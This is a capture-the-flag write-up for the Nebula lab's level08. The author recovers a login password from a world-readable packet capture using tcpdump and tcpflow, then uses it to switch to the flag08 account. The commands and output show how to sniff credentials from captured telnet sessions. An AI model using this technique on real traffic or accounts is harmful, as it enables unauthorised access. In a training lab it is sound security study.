“World readable files strike again. Check what that user was up to, and use it to log into flag08 account.”
This was the verbiage provided in the About section for level08.
The first step I took was to check the home directory for flag08.
level08@nebula:/home/flag08$ ls -l
total 9
-rw-r--r-- 1 root root 8302 2011-11-20 21:22 capture.pcap
It contained a world readable capture file, let’s see what the “the user was up to.” I ran the capture file through tcpdump to search for any credentials:
level08@nebula:/home/flag08$ tcpdump -nnAr capture.pcap | grep -i pass
reading from file capture.pcap, link-type EN10MB (Ethernet)
**Password: **
It appears that password is mentioned in the output. I could move capture.pcap off the system and run it through wireshark to follow the TCP stream, but decided to stick to the command-line.
I used the tool tcpflow to follow the users activity:
level08@nebula:/home/flag08$ tcpflow -C -r capture.pcap
..%
..%
..&..... ..#..'..$
..&..... ..#..'..$
.. .....#.....'.........
.. .38400,38400....#.SodaCan:0....'..DISPLAY.SodaCan:0......xterm..
........"........!
........"..".....b........b.....B.
..............................1.......!
.."....
.."....
..!..........."
........"
.."................
.....................
Linux 2.6.38-8-generic-pae (::ffff:10.1.1.2) (pts/10)
..wwwbugs login:
l
.l
e
.e
v
.v
e
.e
l
.l
8
.8
.
.
Password:
b
a
c
k
d
o
o
r
.
.
.
0
0
R
m
8
.
a
t
e
.
.
.
Login incorrect
wwwbugs login:
The capture caught the user attempting to login to wwwbugs. The login was incorrect, but may have been mistyped.
The output contains a few deletions, which confirms that the user had forgotten some details like “m8” vs. “mate.” Let’s try to login using “backd00Rmate”:
level08@nebula:/home/flag08$ su flag08
Password:
sh-4.2$ id
uid=991(flag08) gid=991(flag08) groups=991(flag08)
sh-4.2$ getflag
You have successfully executed getflag on a target account
Looks like the password I chose was correct. The tricky part of this challenge was finding the “login incorrect” statement, which steered me away from using other combinations of “backdoor…00Rm8.ate”